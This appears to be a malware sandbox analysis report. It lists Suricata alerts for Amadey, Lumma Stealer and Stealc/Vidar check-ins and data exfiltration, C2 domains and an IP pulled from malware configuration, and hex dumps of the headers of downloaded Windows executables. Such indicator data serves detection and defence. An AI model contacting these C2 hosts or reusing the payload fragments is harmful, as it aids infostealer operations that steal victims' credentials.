Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64748 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64779 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64822 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2060102 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (naturewsounds .help) : 192.168.2.9:55365 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060073 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI) : 192.168.2.9:64834 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060073 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI) : 192.168.2.9:64832 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64833 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2060072 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mercharena .biz) : 192.168.2.9:61591 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060104 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shiningrstars .help) : 192.168.2.9:51110 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64844 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060073 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI) : 192.168.2.9:64847 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64845 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64846 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64850 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060073 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI) : 192.168.2.9:64851 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060073 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI) : 192.168.2.9:64841 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64852 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060073 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI) : 192.168.2.9:64853 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64855 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64859 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060073 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI) : 192.168.2.9:64860 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64862 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64867 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060073 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI) : 192.168.2.9:64870 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:64638 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64638 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64641 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:64646 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:64652 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64652 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64655 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:64662 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64660 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:64672 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64672 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:64680 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64675 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64673 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.9:64688 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.9:64697 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.9:64723 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.210.149:443 -> 192.168.2.9:64692
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.9:64694 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:64757 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64757 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.9:64731 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.9:64731 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64774 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.9:64730 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.9:64730 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64701 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:64790 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.9:64729 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.9:64729 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.9:64684 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64830 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64834 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.9:64733 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:64832 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64832 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:64841 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64846 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:64831 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64840 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:64825 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64825 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64858 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:64852 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.210.149:443 -> 192.168.2.9:64689
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64870 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:64856 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64856 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64867 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64854 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:64844 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64844 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:64872 -> 104.21.48.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: RadiatntIdeas.top
Source: Malware configuration extractor	URLs: nestlecompany.world
Source: Malware configuration extractor	URLs: mercharena.biz
Source: Malware configuration extractor	URLs: generalmills.pro
Source: Malware configuration extractor	URLs: stormlegue.com
Source: Malware configuration extractor	URLs: blast-hubs.com
Source: Malware configuration extractor	URLs: blastikcn.com
Source: Malware configuration extractor	URLs: nestlecompany.pro
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199828130190
Source: Malware configuration extractor	IPs: 185.215.113.43

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: xclient.exe.4.dr
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: xclient.exe0.4.dr

Source: global traffic	TCP traffic: 192.168.2.9:61392 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.9:64634 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:34:08 GMTContent-Type: application/octet-streamContent-Length: 345088Last-Modified: Mon, 17 Feb 2025 13:16:20 GMTConnection: keep-aliveETag: "67b336a4-54400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d1 4f 8b d4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 20 00 00 00 04 00 00 00 00 00 00 1a 3a 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 06 17 01 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 39 00 00 4f 00 00 00 00 40 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 34 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 1f 00 00 00 20 00 00 00 20 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 00 00 00 00 40 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 61 74 00 00 00 00 00 1c 05 00 00 80 00 00 00 1c 05 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:34:12 GMTContent-Type: application/octet-streamContent-Length: 6402560Last-Modified: Sun, 16 Feb 2025 17:08:47 GMTConnection: keep-aliveETag: "67b21b9f-61b200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1f 7f d9 ca 5b 1e b7 99 5b 1e b7 99 5b 1e b7 99 4b 9a b4 98 5a 1e b7 99 10 66 b6 98 58 1e b7 99 5b 1e b6 99 5f 1e b7 99 10 9b be 98 5a 1e b7 99 10 9b 48 99 5a 1e b7 99 5b 1e 20 99 5a 1e b7 99 10 9b b5 98 5a 1e b7 99 52 69 63 68 5b 1e b7 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 0a b2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 ea 60 00 00 d4 00 00 00 00 00 00 00 12 00 00 00 10 00 00 00 00 61 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 62 00 00 04 00 00 51 67 62 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 02 61 00 28 00 00 00 00 30 61 00 1c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 61 00 f0 7a 00 00 14 00 61 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1b e8 60 00 00 10 00 00 00 ea 60 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 02 00 00 00 00 61 00 00 04 00 00 00 ee 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 11 00 00 00 10 61 00 00 02 00 00 00 f2 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 1c 40 00 00 00 30 61 00 00 42 00 00 00 f4 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 7a 00 00 00 80 61 00 00 7c 00 00 00 36 61 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:34:21 GMTContent-Type: application/octet-streamContent-Length: 1811456Last-Modified: Tue, 18 Feb 2025 00:16:38 GMTConnection: keep-aliveETag: "67b3d166-1ba400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 03 11 b2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 80 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 69 00 00 04 00 00 36 29 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6a 7a 6f 64 6f 75 6c 00 00 1a 00 00 70 4f 00 00 00 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 68 72 6b 7a 62 72 75 00 10 00 00 00 70 69 00 00 04 00 00 00 7e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 69 00 00 22 00 00 00 82 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:34:27 GMTContent-Type: application/octet-streamContent-Length: 697856Last-Modified: Mon, 17 Feb 2025 20:40:35 GMTConnection: keep-aliveETag: "67b39ec3-aa600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 43 5f 51 f8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 20 00 00 00 08 00 00 00 00 00 00 22 3a 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 0b 00 00 06 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 39 00 00 4f 00 00 00 00 40 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 3c 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 1f 00 00 00 20 00 00 00 20 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 40 00 00 00 06 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 61 74 00 00 00 00 00 3c 05 00 00 80 00 00 00 3c 05 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 61 74 00 00 00 00 00 3c 05 00 00 c0 05 00 00 3c 05 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 